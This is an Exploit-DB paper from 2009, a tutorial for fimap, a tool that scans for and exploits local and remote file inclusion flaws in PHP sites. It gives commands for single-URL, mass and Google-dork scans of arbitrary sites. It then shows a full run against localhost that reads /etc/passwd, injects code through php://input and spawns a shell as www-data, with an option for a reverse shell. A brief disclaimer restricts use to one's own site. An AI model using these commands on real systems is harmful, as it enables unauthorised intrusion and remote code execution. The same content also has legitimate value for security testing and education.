LFI/RFI testing and Exploiting with fimap

EDB-ID:

12872

CVE:

N/A




Platform:

Multiple

Date:

2009-09-03


Title  : LFI/RFI testing and exploiting with fimap
Autor  : Iman Karim (ikarim2s[YOUKNOW]smail.inf.fh-brs.de)
Date   : 3. September 2009
Project: http://fimap.googlecode.com


fimap is currently under development but still usable. Feel free to test it!
This document and tool is not recommend for people who doesn't know what LFI/RFI is.
If you know what it is, it might be a handy tool for you.


Table of Contents
  0. Introduction
    [a] What is fimap?
    [b] Let's go.
  1. Single URL Scan
    [a] Why?
    [b] Ok - show me how.
  2. Mass Scan
  3. Google Scan
  4. Obtaining a shell
  5. Full Example Run
  6. Last Words
  7. Greetings



[0] INTRODUCTION
  [a] What is fimap?
        fimap is a Local- and Remote-File-Injection scanner and exploiter written by me.
        It's released under GPLv2 and you can download it at http://fimap.googlecode.com
  
  [b] LET'S GO
        Befor we start make sure that you don't use fimap for illegal stuff.
        Use it only on your own site to test if your inclusions are secure or not.
        You use it at your own risk and I don't take any responsibility for it.
        Ok - Let's go then!

[1] SINGLE URL SCAN
  [a] Why?
        Sometimes I am playing on my websites GET variables in the browser to check for inclusion bugs.
        When I actually find something fimap is my friend. I can simply give him the URL I found and fimap
        will do the rest for me.
  
  [b] Ok - show me how.
        It's very easy to start a single url scan.
        Simply start fimap using the -u or --url parameter:
        
          imax@DevelB0x:~$ ./fimap.py -u "http://localhost/vulnerable.php?inc=index.php"
        
        If fimap has found an Inclusion-Bug, you will see a box like this:

          ###################################################################################
          #[1] Possible File Injection                                                      #
          ###################################################################################
          #  [URL]      http://localhost/vulnerable.php?inc=index                           #
          #  [PARAM]    inc                                                                 #
          #  [PATH]     /var/www                                                            #
          #  [TYPE]     Absolute Clean + Remote injection                                   #
          #  [NULLBYTE] No Need. It's clean.                                                #
          #  [READABLE FILES]                                                               #
          #                   [0] /etc/passwd                                               #
          #                   [1] php://input                                               #
          #                   [2] http://www.phpbb.de/index.php                             #
          #                   [3] http://www.uni-bonn.de/Frauengeschichte/index.html        #
          #                   [4] http://www.kah-bonn.de/index.htm?presse/winterthur.htm    #
          ###################################################################################
        
        You can see that we actually have readable files. Some of them are usable to inject code - some not.
        fimap will automaticly log every valuable result to '~/fimap_results.xml'. The XML will never be deleted.
        All new results will be injected correctly into the XML. Feel free to delete it if you want.
        Possible injections which can't be successfully exploited by fimap will be logged into a dirty
        csv file: '~/fimap.log'
        
        Well, that's it for single url scanning!  :) 
        If you want to spawn a shell using your newly found bug(s) watch [4]

[2] MASS SCAN
    Mass scanning is very similar to single url scanning. The only difference is (you guess it):
    you can scan a whole txt (each line = one url) for inclusion bugs.
    Just like in single url mode everything will be logged to the log files.
    To use mass mode use:
      
      imax@DevelB0x:~$ ./fimap.py -m -l "/tmp/myurllist.txt"


[3] GOOGLE SCAN
    Same as mass scan. But instead of getting the urls from a txt-list it will use google to get urls.
    To use google mode use:
      
      imax@DevelB0x:~$ ./fimap.py -g -q 'inurl:"include.php"'
        or
      imax@DevelB0x:~$ ./fimap.py -g -q 'inurl:"req.php" -svn -trak -cvs'

[4] OBTAINING A SHELL
    If you have found some inclusion bugs you can directly make use of them!
    Simply call:
    
      imax@DevelB0x:~$ ./fimap.py -x
    
    fimap will ask you some questions and then you should have a shell!

[5] FULL EXAMPLE RUN
      
 [CMD]imax@DevelB0x:~$ ./fimap.py -u "http://localhost/vulnerable.php?inc=index.php"
      fimap v.01 by Iman Karim - Automatic LFI/RFI scanner and exploiter.      
      SingleScan is testing URL: 'http://localhost/vulnerable.php?inc=index.php'
      [OUT] Parsing URL 'http://localhost/vulnerable.php?inc=index.php'...      
      [INFO] Fiddling around with URL...                                        
      [OUT] Possible file inclusion found! -> 'http://localhost/vulnerable.php?inc=bUTeWg6j' with Parameter 'inc'.
      [OUT] Identifing Vulnerability 'http://localhost/vulnerable.php?inc=index.php' with Key 'inc'...            
      [INFO] Scriptpath received: '/var/www'                                                                      
      [INFO] Testing file '/etc/passwd'...                                                                        
      [INFO] Testing file '/proc/self/environ'...                                                                 
      [INFO] Testing file 'php://input'...                                                                        
      [INFO] Testing file 'http://www.phpbb.de/index.php'...                                                      
      [INFO] Testing file 'http://www.uni-bonn.de/Frauengeschichte/index.html'...                                 
      [INFO] Testing file 'http://www.kah-bonn.de/index.htm?presse/winterthur.htm'...                             
      ###################################################################################                         
      #[1] Possible File Injection                                                      #                         
      ###################################################################################                         
      #  [URL]      http://localhost/vulnerable.php?inc=index.php                       #                         
      #  [PARAM]    inc                                                                 #                         
      #  [PATH]     /var/www                                                            #                         
      #  [TYPE]     Absolute Clean + Remote injection                                   #                         
      #  [NULLBYTE] No Need. It's clean.                                                #                         
      #  [READABLE FILES]                                                               #                         
      #                   [0] /etc/passwd                                               #                         
      #                   [1] php://input                                               #
      #                   [2] http://www.phpbb.de/index.php                             #
      #                   [3] http://www.uni-bonn.de/Frauengeschichte/index.html        #
      #                   [4] http://www.kah-bonn.de/index.htm?presse/winterthur.htm    #
      ###################################################################################
 [CMD]imax@DevelB0x:~$ ./fimap.py -x
      fimap v.01 by Iman Karim - Automatic LFI/RFI scanner and exploiter.
      ###################
      #List of Domains  #
      ###################
      #[1] localhost    #
      ###################
      Choose Domain: 1
      ###############################################################################################
      #FI Bugs on localhost                                                                         #
      ###############################################################################################
      #[1] URL: '/vulnerable.php?inc=index.php' injecting file: 'php://input' using param: 'inc'    #
      ###############################################################################################
      Choose vulnerable script: 1
      [INFO] Testing code injection thru POST...
      [OUT] PHP Injection works! Testing if execution works...
      [OUT] Testing execution thru 'popen'...
      #################################
      #Available Attacks              #
      #################################
      #[1] Spawn Shell                #
      #[2] Create reverse shell...    #
      #################################
      Choose Attack: 1
      -------------------------------------------
      Welcome to fimap shell!
      Better don't start interactive commands!  ;) 
      Enter 'q' to exit the shell.
      -------------------------------------------
      fimap_shell$> id
      uid=33(www-data) gid=33(www-data) groups=33(www-data)
      fimap_shell$> uname -a
      Linux DevelB0x 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
      fimap_shell$> q

      See ya dude!


[6] LAST WORDS
  You can configure most of the attack vectors in the config.py file inside your fimap directory.
  The file is documentated. So check the file for more infos. All I can say here is that if you 
  want the full advantage of RFI attacks you should configure your settings["dynamic_rfi"] dict.
  Please remember that fimap is currently under a week old and under heavy development.
  Goto http://fimap.googlecode.com and stay tuned about updates.
  To check out the lastest code use:
     svn checkout http://fimap.googlecode.com/svn/trunk/ fimap

  I don't know and currently don't care if it works on windows. Works fine on Unixes.
  If you find a bug feel free to report it.
  I hope you like it. 

[7] GREETINGS
  Greetings to: rita, exorzist, invisible, ruun, beatkeeper, dextrous


Afghans can code too!  :) 

# milw0rm.com [2009-09-03]